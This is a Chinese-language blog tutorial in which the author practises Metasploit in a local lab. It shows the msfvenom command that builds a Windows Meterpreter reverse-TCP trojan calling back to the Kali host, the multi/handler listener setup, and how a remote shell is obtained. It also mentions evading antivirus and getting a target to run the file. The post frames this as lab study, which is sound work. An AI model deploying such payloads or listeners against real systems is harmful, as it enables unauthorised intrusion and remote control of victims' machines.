前段时间学了msf的一些基础知识,正好有时间了,在本地搭建好了环境,准备练练手。(Tips:请勿用作非法用途,仅供学术交流)
MSF介绍
Metasploit Framework (MSF)是2003 年以开放源代码方式发布、可自由获取的开发框架,这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个可靠的平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,最新版本的MSF 包含了180多种当前流行的操作系统和应用软件的exploit,以及100多 个shellcode。作为安全工具,它在安全检测中起到不容忽视的作用,并为漏洞自动化探测和及时检测系统漏洞提供有力的保障。
配置环境
kali:192.168.83.128
靶机:192.168.83.129
step1-生成木马
今天需要使用到msfvenom来生成木马。
基础用法作用-p, --payload使用攻击负荷。指定一个’-'或者输入(stdin)用户自定义的payloads(攻击负荷)。-f, --format输出格式(使用 --help-formats来查看变量格式列表)-o,–out保存攻击负荷(payload)
在此次实验中命令为:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.83.128 LPORT=4444 -f exe -o payload.exe
这里的LHOST为kali的IP,LPORT自然为kali的端口。
ok,生成成功。
step2-将木马传入到靶机
这一步就要靠自己的技巧了,而在这里我是在本地进行试验
(ps:自行试验时目标主机必须得关闭安全防护比如防火墙,360等等,如果没关,则需要对木马进行免杀处理,木马才能成功运行)
step3-使用msf侦听
use exploit/mulit/handlerset payload windows/meterpreter/reverse_tcpset LHOST 192.168.83.128 //kali的ipset LPORT 4444 //kali的端口run
step4-运行木马
这一步是通过你自己的技术,使对方运行你的木马,由于我是在本地试验,就不赘述了。
step5-获取shell
当对方成功运行木马之后,就会反弹一个shell。
在meterpreter后输入shell即可获取目标靶机的一个shell
(类似于cmd,可以执行系统命令)
相信看到这里,大家应该心中都有了答案,入侵一个系统确实不难,所以咱们得把技术用到正地方,而不是想着如何入侵别人的系统,本文也仅供学术交流,大家千万不要在真实环境试验,可以的话,自行搭建本地环境,锻炼一下自己的技术,本文实现起来不算很难,最后的最后,感谢支持!
网友评论